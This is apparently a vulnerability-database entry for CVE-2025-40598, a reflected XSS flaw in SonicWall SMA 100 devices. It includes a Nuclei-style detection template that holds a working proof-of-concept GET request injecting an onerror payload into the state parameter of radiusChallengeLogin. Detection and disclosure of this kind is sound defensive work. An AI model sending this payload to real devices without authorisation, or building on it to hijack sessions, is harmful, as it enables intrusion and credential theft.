SonicWall SMA 100 Web Interface Cross Site Scripting Vulnerability
漏洞信息
漏洞名称: SonicWall SMA 100 Web Interface Cross Site Scripting Vulnerability
漏洞编号:
CVE: CVE-2025-40598
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: SonicWall SMA 100系列是一款广泛使用的安全移动接入设备,为企业提供远程访问解决方案。该设备的Web界面存在一个反射型跨站脚本(XSS)漏洞,允许远程未认证攻击者执行任意JavaScript代码。此漏洞的根源在于Web界面未能正确过滤用户输入,导致攻击者可以注入恶意脚本。成功利用此漏洞的攻击者可以在受害者的浏览器上下文中执行任意JavaScript代码,可能导致会话劫持、凭证盗窃或其他恶意活动。由于攻击者需要诱导用户访问特制的URL,因此攻击需要一定的用户交互。尽管如此,此漏洞仍然对使用受影响版本SonicWall SMA 100系列设备的企业构成了中等级别的安全风险。
info: name:SonicWall SMA 100 - Web Interface Cross Site Scripting author:watchtowr,DhiyaneshDK severity:medium description:| A reflected cross-site scripting (XSS) vulnerability exists in the SMA100 series web interface, allowing a remote unauthenticated attacker to potentially execute arbitrary JavaScript code. impact:| Successful exploitation could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, credential theft, or other malicious activities. remediation:| Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability. reference: -https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012 -https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/ classification: cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score:6.1 cve-id:CVE-2025-40598 cwe-id:CWE-79 metadata: verified:true max-request:1 vendor:sonicwall product:sma_100_firmware shodan-query:intitle:"sonicwall" tags:cve,cve2025,xss,sonicwall,sma100
http: -method: GET path: -"{{BaseURL}}/cgi-bin/radiusChallengeLogin?portalName=portal1&status=needchallenge&state=\"><img/src=x+onerror=alert`1`>"
matchers-condition:and matchers: -type: word part:body words: -'"><img/src=x+onerror=alert`1`>' -'SMA' condition:and